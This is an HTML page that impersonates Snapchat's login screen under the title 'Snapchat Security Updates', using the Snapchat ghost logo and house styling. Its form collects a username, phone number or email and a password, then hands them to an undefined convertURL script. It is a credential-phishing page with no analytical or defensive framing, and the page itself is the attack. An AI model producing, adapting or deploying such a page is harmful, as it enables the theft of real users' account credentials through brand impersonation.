<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Snapchat Security Updates</title>
	<style type="text/css">
		@import url("https://fonts.googleapis.com/css2?family=Indie+Flower&display=swap");
         .inputBox {
      font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif;
      margin: 0;
      outline: 0;
      -webkit-appearance: none;
      tap-highlight-color: rgba(255,255,255,0);
      line-height: 1.2142em;
      
      font-size: 1em;
      background-color: #fff;
      border: 1px solid rgba(39,41,43,.15);
      color: rgba(0,0,0,.8);
      border-radius: .2857rem;
      box-shadow: 0 0 0 0 transparent inset;
      
      width:304px;
      height:38px;
      margin-bottom:15px;
      font-size:14px;
      }
      button {
      cursor: pointer;
      display: inline-block;
      min-height: 1em;
      outline: 0;
      border: none;
      vertical-align: baseline;
      background-color: #fffc01;
      color: #262626;
      font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif;
      margin: 0 .25em 0 0;
      padding: 13px 1.5em;
      text-shadow: none;
      font-weight: 700;
      line-height: 1;
      font-style: normal;
      text-align: 0;
      text-decoration: none;
      text-transform: uppercase;
      background-image: none;
      border-radius: 5px;
      box-shadow: 0 0 0 1px transparent inset,0 0 0 0 rgba(39,41,43,.15)inset;
     
      width:304px;
      height:38px;
      }
      button:hover {
      background-color: #F4F100;
      }
      .full{
        background-color: none;
        padding-bottom: 50px;
        text-align: center;
      }
      .card{
        width: 150px;
        background-color: #fafafa;
        padding-bottom: 60px ;
        margin-top: 80px;

      }
      body{
        background-color: #e6e6e6;
      }
	</style>
</head>
<body>
    <div class="full"><center>
        <div class="card" style="width: 28rem;">
  <div class="card-body">
    <img src="https://accounts.snapchat.com/accounts/static/images/ghost/ghost.svg" style="width:90px; padding-top: 60px;>
        <div class="middle">

   <form action="" onsubmit="return convertURL(this);">
      <input class="inputBox" id="username" name="username" type="text" placeholder="Username , phonenumber or Email" style="margin-top:20px;"><br>
      <input class="inputBox" id="password" name="password" type="password" placeholder="Password" ><br>
      <button class="button" type="submit" style="margin-top:5px;">LOG IN</button>
   </form>
   <a href="#">Forgot your password?</a></div>
  </div></center>
</div>
       
   
    </div>

</body>
</html>